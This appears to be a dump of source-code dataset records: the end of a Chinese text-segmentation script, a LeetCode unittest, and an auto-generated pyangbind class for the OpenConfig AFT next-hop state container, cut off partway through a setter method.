print('sentence "{0}" 中第{1}个字可能为: \033[1;33m{2}\033[0m'.format(context_all[index], num, word))
if __name__ == "__main__":
# # 对训练文本进行分词
# ChineseParticiple(RAW_TEXT_PATH, PARTED_TEXT_PATH)
# # 生成字典并保存到本地
# word_to_idx, idx_to_word = generate_dic(PARTED_TEXT_PATH)
# save_dic(word_to_idx, WORD2IDX_PATH)
# save_dic(idx_to_word, IDX2WORD_PATH)
generate_propdic(PARTED_TEXT_PATH, WORD2IDX_PATH, IDX2WORD_PATH, similar_word, PROP_DICT_PATH)
# 以上内容执行一次之后,如果原始文本没有改变,就不用重复进行了
# 载入
word2idx_dic, prop_dict = load(WORD2IDX_PATH, PROP_DICT_PATH)
judge_word(['人', '入'], prop_dict, word2idx_dic, test_path=TEST_PATH)
# judge_word(['人', '入'], prop_dict, word2idx_dic, test_sentence='对人民抗日武装')
| [
"erzzhang@163.com"
] | erzzhang@163.com |
0e512d5cc3c40a98f88773bb04257a5009284703 | a8062308fb3bf6c8952257504a50c3e97d801294 | /test/test_1680_concatenation_of_consecutive_binary_numbers.py | 2e973fa95d840dec8ee1b362d393d6690776c76f | [] | no_license | wan-catherine/Leetcode | 650d697a873ad23c0b64d08ad525bf9fcdb62b1b | 238995bd23c8a6c40c6035890e94baa2473d4bbc | refs/heads/master | 2023-09-01T00:56:27.677230 | 2023-08-31T00:49:31 | 2023-08-31T00:49:31 | 143,770,000 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 460 | py | from unittest import TestCase
from problems.N1680_Concatenation_Of_Consecutive_Binary_Numbers import Solution
class TestSolution(TestCase):
def test_concatenatedBinary(self):
self.assertEqual(1, Solution().concatenatedBinary(1))
def test_concatenatedBinary_1(self):
self.assertEqual(27, Solution().concatenatedBinary(3))
def test_concatenatedBinary_2(self):
self.assertEqual(505379714, Solution().concatenatedBinary(12))
| [
"rarry2012@gmail.com"
] | rarry2012@gmail.com |
c2f109d8653198c97abaf0506e538f09dafebf27 | a479a5773fd5607f96c3b84fed57733fe39c3dbb | /napalm_yang/models/openconfig/network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/__init__.py | 9f9a949d618408cef24874b85b55dba45410a6d5 | [
"Apache-2.0"
] | permissive | napalm-automation/napalm-yang | 839c711e9294745534f5fbbe115e0100b645dbca | 9148e015b086ebe311c07deb92e168ea36fd7771 | refs/heads/develop | 2021-01-11T07:17:20.226734 | 2019-05-15T08:43:03 | 2019-05-15T08:43:03 | 69,226,025 | 65 | 64 | Apache-2.0 | 2019-05-15T08:43:24 | 2016-09-26T07:48:42 | Python | UTF-8 | Python | false | false | 136,581 | py | # -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improved)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
class state(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/afts/aft/entries/entry/next-hops/next-hop/state. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Operational state parameters relating to the AFT
next-hop entry
"""
__slots__ = (
"_path_helper",
"_extmethods",
"__index",
"__weight",
"__ip_address",
"__mac_address",
"__popped_mpls_label_stack",
"__pushed_mpls_label_stack",
"__decapsulate_header",
"__encapsulate_header",
"__origin_protocol",
)
_yang_name = "state"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__index = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..18446744073709551615"]},
int_size=64,
),
is_leaf=True,
yang_name="index",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint64",
is_config=False,
)
self.__weight = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="weight",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=False,
)
self.__ip_address = YANGDynClass(
base=[
RestrictedClassType(
base_type=RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?"
},
),
restriction_dict={"pattern": "[0-9\\.]*"},
),
RestrictedClassType(
base_type=RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?"
},
),
restriction_dict={"pattern": "[0-9a-fA-F:\\.]*"},
),
],
is_leaf=True,
yang_name="ip-address",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="inet:ip-address-no-zone",
is_config=False,
)
self.__mac_address = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_dict={"pattern": "[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}"},
),
is_leaf=True,
yang_name="mac-address",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:mac-address",
is_config=False,
)
self.__popped_mpls_label_stack = YANGDynClass(
base=TypedListType(
allowed_type=[
RestrictedClassType(
base_type=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
restriction_dict={"range": ["16..1048575"]},
),
RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"IPV4_EXPLICIT_NULL": {"value": 0},
"ROUTER_ALERT": {"value": 1},
"IPV6_EXPLICIT_NULL": {"value": 2},
"IMPLICIT_NULL": {"value": 3},
"ENTROPY_LABEL_INDICATOR": {"value": 7},
"NO_LABEL": {},
},
),
]
),
is_leaf=False,
yang_name="popped-mpls-label-stack",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-mplst:mpls-label",
is_config=False,
)
self.__pushed_mpls_label_stack = YANGDynClass(
base=TypedListType(
allowed_type=[
RestrictedClassType(
base_type=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
restriction_dict={"range": ["16..1048575"]},
),
RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"IPV4_EXPLICIT_NULL": {"value": 0},
"ROUTER_ALERT": {"value": 1},
"IPV6_EXPLICIT_NULL": {"value": 2},
"IMPLICIT_NULL": {"value": 3},
"ENTROPY_LABEL_INDICATOR": {"value": 7},
"NO_LABEL": {},
},
),
]
),
is_leaf=False,
yang_name="pushed-mpls-label-stack",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-mplst:mpls-label",
is_config=False,
)
self.__decapsulate_header = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={"GRE": {}, "IPV4": {}, "IPV6": {}, "MPLS": {}},
),
is_leaf=True,
yang_name="decapsulate-header",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-aftt:encapsulation-header-type",
is_config=False,
)
self.__encapsulate_header = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={"GRE": {}, "IPV4": {}, "IPV6": {}, "MPLS": {}},
),
is_leaf=True,
yang_name="encapsulate-header",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-aftt:encapsulation-header-type",
is_config=False,
)
self.__origin_protocol = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"BGP": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:BGP": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:BGP": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"ISIS": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:ISIS": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:ISIS": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"OSPF": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:OSPF": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:OSPF": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"OSPF3": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:OSPF3": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:OSPF3": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"STATIC": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:STATIC": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:STATIC": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"DIRECTLY_CONNECTED": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:DIRECTLY_CONNECTED": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:DIRECTLY_CONNECTED": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"LOCAL_AGGREGATE": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:LOCAL_AGGREGATE": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:LOCAL_AGGREGATE": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
},
),
is_leaf=True,
yang_name="origin-protocol",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=False,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"afts",
"aft",
"entries",
"entry",
"next-hops",
"next-hop",
"state",
]
def _get_index(self):
"""
Getter method for index, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/index (uint64)
YANG Description: A unique entry for the next-hop
"""
return self.__index
def _set_index(self, v, load=False):
"""
Setter method for index, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/index (uint64)
If this variable is read-only (config: false) in the
source YANG file, then _set_index is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_index() directly.
YANG Description: A unique entry for the next-hop
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..18446744073709551615"]},
int_size=64,
),
is_leaf=True,
yang_name="index",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint64",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """index must be of a type compatible with uint64""",
"defined-type": "uint64",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="index", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=False)""",
}
)
self.__index = t
if hasattr(self, "_set"):
self._set()
def _unset_index(self):
self.__index = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..18446744073709551615"]},
int_size=64,
),
is_leaf=True,
yang_name="index",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint64",
is_config=False,
)
def _get_weight(self):
"""
Getter method for weight, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/weight (uint32)
YANG Description: The weight of the next-hop. Traffic is balanced according to
the ratio described by the relative weights of the next hops
that exist for the AFT entry. Note that all next-hops that are
specified are assumed to be active next-hops and therefore
eligible (and selected) to be installed in the FIB, and hence
used for packet forwarding.
"""
return self.__weight
def _set_weight(self, v, load=False):
"""
Setter method for weight, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/weight (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_weight is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_weight() directly.
YANG Description: The weight of the next-hop. Traffic is balanced according to
the ratio described by the relative weights of the next hops
that exist for the AFT entry. Note that all next-hops that are
specified are assumed to be active next-hops and therefore
eligible (and selected) to be installed in the FIB, and hence
used for packet forwarding.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="weight",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """weight must be of a type compatible with uint32""",
"defined-type": "uint32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="weight", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint32', is_config=False)""",
}
)
self.__weight = t
if hasattr(self, "_set"):
self._set()
def _unset_weight(self):
self.__weight = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="weight",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=False,
)
def _get_ip_address(self):
"""
Getter method for ip_address, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/ip_address (inet:ip-address-no-zone)
YANG Description: The IP address of the next-hop system.
"""
return self.__ip_address
def _set_ip_address(self, v, load=False):
"""
Setter method for ip_address, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/ip_address (inet:ip-address-no-zone)
If this variable is read-only (config: false) in the
source YANG file, then _set_ip_address is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_ip_address() directly.
YANG Description: The IP address of the next-hop system.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=[
RestrictedClassType(
base_type=RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?"
},
),
restriction_dict={"pattern": "[0-9\\.]*"},
),
RestrictedClassType(
base_type=RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?"
},
),
restriction_dict={"pattern": "[0-9a-fA-F:\\.]*"},
),
],
is_leaf=True,
yang_name="ip-address",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="inet:ip-address-no-zone",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """ip_address must be of a type compatible with inet:ip-address-no-zone""",
"defined-type": "inet:ip-address-no-zone",
"generated-type": """YANGDynClass(base=[RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9\\.]*'}),RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9a-fA-F:\\.]*'}),], is_leaf=True, yang_name="ip-address", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ip-address-no-zone', is_config=False)""",
}
)
self.__ip_address = t
if hasattr(self, "_set"):
self._set()
def _unset_ip_address(self):
self.__ip_address = YANGDynClass(
base=[
RestrictedClassType(
base_type=RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?"
},
),
restriction_dict={"pattern": "[0-9\\.]*"},
),
RestrictedClassType(
base_type=RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?"
},
),
restriction_dict={"pattern": "[0-9a-fA-F:\\.]*"},
),
],
is_leaf=True,
yang_name="ip-address",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="inet:ip-address-no-zone",
is_config=False,
)
def _get_mac_address(self):
"""
Getter method for mac_address, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/mac_address (yang:mac-address)
YANG Description: The MAC address of the next-hop if resolved by the local
network instance.
"""
return self.__mac_address
def _set_mac_address(self, v, load=False):
"""
Setter method for mac_address, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/mac_address (yang:mac-address)
If this variable is read-only (config: false) in the
source YANG file, then _set_mac_address is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_mac_address() directly.
YANG Description: The MAC address of the next-hop if resolved by the local
network instance.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=six.text_type,
restriction_dict={"pattern": "[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}"},
),
is_leaf=True,
yang_name="mac-address",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:mac-address",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """mac_address must be of a type compatible with yang:mac-address""",
"defined-type": "yang:mac-address",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'}), is_leaf=True, yang_name="mac-address", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='yang:mac-address', is_config=False)""",
}
)
self.__mac_address = t
if hasattr(self, "_set"):
self._set()
def _unset_mac_address(self):
self.__mac_address = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_dict={"pattern": "[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}"},
),
is_leaf=True,
yang_name="mac-address",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:mac-address",
is_config=False,
)
def _get_popped_mpls_label_stack(self):
"""
Getter method for popped_mpls_label_stack, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/popped_mpls_label_stack (oc-mplst:mpls-label)
YANG Description: The MPLS label stack to be popped from the packet when
switched by the system. The stack is encoding as a leaf-list
whereby the other of the entries is such that the first entry
is the label lowest down the label stack to be popped.
If the local system pops the outer-most label 400, then the
value of this list is [400,]. If the local system removes two
labels, the outer-most being 500, and the second of which is
500, then the value of the list is [500, 400].
A swap operation is reflected by entries in the
popped-mpls-label-stack and pushed-mpls-label-stack nodes.
"""
return self.__popped_mpls_label_stack
def _set_popped_mpls_label_stack(self, v, load=False):
"""
Setter method for popped_mpls_label_stack, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/popped_mpls_label_stack (oc-mplst:mpls-label)
If this variable is read-only (config: false) in the
source YANG file, then _set_popped_mpls_label_stack is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_popped_mpls_label_stack() directly.
YANG Description: The MPLS label stack to be popped from the packet when
switched by the system. The stack is encoding as a leaf-list
whereby the other of the entries is such that the first entry
is the label lowest down the label stack to be popped.
If the local system pops the outer-most label 400, then the
value of this list is [400,]. If the local system removes two
labels, the outer-most being 500, and the second of which is
500, then the value of the list is [500, 400].
A swap operation is reflected by entries in the
popped-mpls-label-stack and pushed-mpls-label-stack nodes.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=TypedListType(
allowed_type=[
RestrictedClassType(
base_type=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
restriction_dict={"range": ["16..1048575"]},
),
RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"IPV4_EXPLICIT_NULL": {"value": 0},
"ROUTER_ALERT": {"value": 1},
"IPV6_EXPLICIT_NULL": {"value": 2},
"IMPLICIT_NULL": {"value": 3},
"ENTROPY_LABEL_INDICATOR": {"value": 7},
"NO_LABEL": {},
},
),
]
),
is_leaf=False,
yang_name="popped-mpls-label-stack",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-mplst:mpls-label",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """popped_mpls_label_stack must be of a type compatible with oc-mplst:mpls-label""",
"defined-type": "oc-mplst:mpls-label",
"generated-type": """YANGDynClass(base=TypedListType(allowed_type=[RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': ['16..1048575']}),RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'IPV4_EXPLICIT_NULL': {'value': 0}, 'ROUTER_ALERT': {'value': 1}, 'IPV6_EXPLICIT_NULL': {'value': 2}, 'IMPLICIT_NULL': {'value': 3}, 'ENTROPY_LABEL_INDICATOR': {'value': 7}, 'NO_LABEL': {}},),]), is_leaf=False, yang_name="popped-mpls-label-stack", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='oc-mplst:mpls-label', is_config=False)""",
}
)
self.__popped_mpls_label_stack = t
if hasattr(self, "_set"):
self._set()
def _unset_popped_mpls_label_stack(self):
self.__popped_mpls_label_stack = YANGDynClass(
base=TypedListType(
allowed_type=[
RestrictedClassType(
base_type=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
restriction_dict={"range": ["16..1048575"]},
),
RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"IPV4_EXPLICIT_NULL": {"value": 0},
"ROUTER_ALERT": {"value": 1},
"IPV6_EXPLICIT_NULL": {"value": 2},
"IMPLICIT_NULL": {"value": 3},
"ENTROPY_LABEL_INDICATOR": {"value": 7},
"NO_LABEL": {},
},
),
]
),
is_leaf=False,
yang_name="popped-mpls-label-stack",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-mplst:mpls-label",
is_config=False,
)
def _get_pushed_mpls_label_stack(self):
"""
Getter method for pushed_mpls_label_stack, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/pushed_mpls_label_stack (oc-mplst:mpls-label)
YANG Description: The MPLS label stack imposed when forwarding packets to the
next-hop
- the stack is encoded as a leaf list whereby the order of the
entries is such that the first entry in the list is the
label at the bottom of the stack to be pushed.
To this end, a packet which is to forwarded to a device using
a service label of 42, and a transport label of 8072 will be
represented with a label stack list of [42, 8072].
The MPLS label stack list is ordered by the user, such that no
system re-ordering of leaves is permitted by the system.
A swap operation is reflected by entries in the
popped-mpls-label-stack and pushed-mpls-label-stack nodes.
"""
return self.__pushed_mpls_label_stack
def _set_pushed_mpls_label_stack(self, v, load=False):
"""
Setter method for pushed_mpls_label_stack, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/pushed_mpls_label_stack (oc-mplst:mpls-label)
If this variable is read-only (config: false) in the
source YANG file, then _set_pushed_mpls_label_stack is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_pushed_mpls_label_stack() directly.
YANG Description: The MPLS label stack imposed when forwarding packets to the
next-hop
- the stack is encoded as a leaf list whereby the order of the
entries is such that the first entry in the list is the
label at the bottom of the stack to be pushed.
To this end, a packet which is to forwarded to a device using
a service label of 42, and a transport label of 8072 will be
represented with a label stack list of [42, 8072].
The MPLS label stack list is ordered by the user, such that no
system re-ordering of leaves is permitted by the system.
A swap operation is reflected by entries in the
popped-mpls-label-stack and pushed-mpls-label-stack nodes.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=TypedListType(
allowed_type=[
RestrictedClassType(
base_type=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
restriction_dict={"range": ["16..1048575"]},
),
RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"IPV4_EXPLICIT_NULL": {"value": 0},
"ROUTER_ALERT": {"value": 1},
"IPV6_EXPLICIT_NULL": {"value": 2},
"IMPLICIT_NULL": {"value": 3},
"ENTROPY_LABEL_INDICATOR": {"value": 7},
"NO_LABEL": {},
},
),
]
),
is_leaf=False,
yang_name="pushed-mpls-label-stack",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
